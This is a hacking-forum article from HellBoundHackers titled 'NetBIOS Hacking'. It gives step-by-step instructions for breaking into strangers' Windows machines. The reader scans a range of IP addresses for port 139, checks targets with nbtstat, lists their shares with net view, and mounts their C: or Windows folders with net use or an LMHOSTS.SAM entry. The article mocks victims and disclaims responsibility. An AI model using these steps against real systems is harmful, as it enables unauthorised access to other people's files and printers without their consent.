Follow us on Twitter!
Hacking isn't just Computers & Exploits. It's a Philosophy. - Mr_Cheese
Sunday, April 20, 2014
HellBoundHackers Main:
HellBoundHackers Find:
HellBoundHackers Information:
HellBoundHackers Exploit:
HellBoundHackers Programming:
HellBoundHackers Think:
HellBoundHackers Track:
HellBoundHackers Patch:
HellBoundHackers Other:
HellBoundHackers Need Help?
Members Online
Total Online: 37
Guests Online: 36
Members Online: 1

Registered Members: 82847
Newest Member: Zanjux
Latest Articles

NetBIOS Hacking

Arrow Image NetBIOS (Network Basic Input/Output System) Hacking

<b>NetBIOS Hacking</b>
<b>By ZenX</b>
<b>Member of XITIN’</b>

NetBIOS (Network Basic Input/Output System) hacking is extremely easy to do. This article will not describe what NetBIOS is or how it works, but it will describe how to exploit the vulnerability in NetBIOS. This is a old type of hack and most systems are patched, but there are still some systems out there that are vulnerable. Well, let’s get on to it.

NetBIOS use these ports:

• UDP ports for network browsing:
o Port 137 (NetBIOS name services)
o Port 138 (NetBIOS datagram services)
• TCP ports for Server Message Block (SMB):
o Port 139 (NetBIOS session services)
o Port 445 (runs SMB over TCP/IP without NetBIOS)

We will concentrate on TCP port 139. So we find ourselves a Port-Scanner, Angry IP Scanner for example. And we scan a range of 200 IP-addresses, or more or less, you decide. We should filter out those IP-addresses that have TCP port 139 open. So when you got some IP-addresses with TCP port 139 open we should move on to the next step.

Start --> Run --> cmd

And we get into command. There we will use this command: nbtstat (NetBIOS over TCP/IP Statistics).

nbtstat –a [IP]

We can use this command to check if a computer system is vulnerable. For example:

nbtstat –a IP

Name Type Status
JOHN <00> UNIQUE Registered
JOHN <20> UNIQUE Registered
MSHOME <00> GROUP Registered
MSHOME <1E> GROUP Registered

MAC-address = [MAC-address]

Here we see that the computer of the IP-address has a hostname named JOHN and it is in the workgroup called MSHOME. The <20> after JOHN means that he have activated Printer and File-Sharing, and he is vulnerable. If <03> is after the name it means he have administrative rights.

The next step is to exploit the vulnerability we have just found. There are two ways, the netuse way and the LMHOSTS.SAM way.


First you need to see what JOHN is sharing, and you do that with the net view command.

net view [IP]

For example:

Net view IP

Shared resources on IP

Name Type
Cannon PIXMA iP5000 Print
Shared docu<i></i>ments Disk
C Disk
Windows Disk

Here we see that this idiot has shared C and his Windows folder! Now we use the net use command.

net use [drive]: \\\\IP\\Shared resource

For example:

net use k: \\\\IP\\Windows

The command is successful

You have just added the Windows folder on JOHN’s computer to your “My Computer” under the k: disk. You can do the same with the printer, so that you can print something on his printer from your computer. Now you can double click on k: disk in your “My Computer” and you get into his Windows folder.


Another way to exploit this vulnerability is to change the LMHOSTS.SAM file.
Follow these steps:

• Find your LMHOSTS.SAM file, by searching in your Windows folder.
• Once you have found it, open it in notepad.
• Go down to the bottom of the file, and type in this:
JOHN [his IP-address].
• Go to search and choose computers, search for JOHN.
• Then you get the result, if JOHN stands there you can dobble-click on it, and you get on his computer and can see his shared files and folders.

Well, you see it is very easy to do.

XITIN’ or I take no responsibility for what you may do when you have read this article.

<b>By ZenX</b>
<b>Member of XITIN’</b>

No Comments have been Posted.
Post Comment


You must have completed the challenge Basic 1 and have 100 points or more, to be able to post.